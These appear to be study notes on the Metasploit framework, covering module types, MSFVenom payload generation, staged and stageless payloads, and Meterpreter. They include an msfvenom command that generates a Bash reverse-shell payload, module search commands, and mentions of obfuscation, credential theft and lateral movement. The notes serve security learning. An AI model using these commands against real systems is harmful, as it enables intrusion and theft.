Metasploit is a powerful penetration testing framework used for security assessments and exploit development. 
It provides a wide range of tools and features to assess and exploit vulnerabilities in systems.

Metasploit Modules
    Modules are the main components of the Metasploit framework. 
    To use Metasploit, you interact with the modules that Metasploit gives you. 
    Some of them are:
        Auxiliary modules: These are used to perform reconnaissance on a server or test for specific vulnerabilities.
        Exploit modules: These are used to exploit a server or a running service on a server, 
            usually resulting in a reverse shell or Meterpreter session.
        Payload modules: These provide the actual code that runs on the exploited server to perform some function, 
            usually a reverse shell or Meterpreter session, but not always, 
            e.g., running a PowerShell command. Payloads can be customized depending on the situation.
        Post modules: These provide functionality after a reverse shell or Meterpreter session is established, 
            e.g., stealing credentials or lateral movement.

commands




MSFVenom
    MSFVenom is a malicious payload generation program.
    It can generate several types of payloads, including compiled programs, raw payloads, and more.
    Most of these payloads result in reverse shells, Meterpreter shells, 
        or commands that must be executed on the target system.
    
        Here are some ways to customize the resulting payloads:
            Encoding: Convert information, or an instruction, into a particular form.
            Obfuscation: Mixing, jumbling, or obscuring some information so that it does not look malicious, even though it is malicious.
            Encryption: Changing information to secret code from its original form.
        
    Meterpreter shells come in two flavors: staged and stageless. Both have pros and cons.
        Staged payloads: These tend to be smaller, meaning that they can be included in more 
            types of exploitation but must reach back to the Metasploit Command and Control (C2) server 
            to get what they need to execute, presenting a risk of being caught.
        Stageless payloads: Everything the payload needs is included in it. This makes the payload bigger but more reliable.
    
    The following command lists all the various payloads that can be generated using MSFVenom:
        msfvenom --list payloads
    
    Once you find a payload appropriate for the system you are attempting to exploit, 
        you can customize where it connects. 
    For example, the following command generates a Bash payload that establishes 
        a reverse shell to 127.0.0.1 on port 1234:
    
        msfvenom -p cmd/unix/reverse_bash LHOST=127.0.0.1 LPORT=1234



Meterpreter
    Meterpreter can be thought of as a reverse shell with advanced penetration testing capabilities.
    Several Metasploit modules result in either a reverse shell or a Meterpreter shell, 
        so it is advisable to get comfortable with how to use them.
    A Meterpreter shell provides shell access to the compromised system and the post modules that Metasploit provides.

    Depending on whether you have a Meterpreter on a Windows or a Linux system:
        search post/windows
        search post/linux
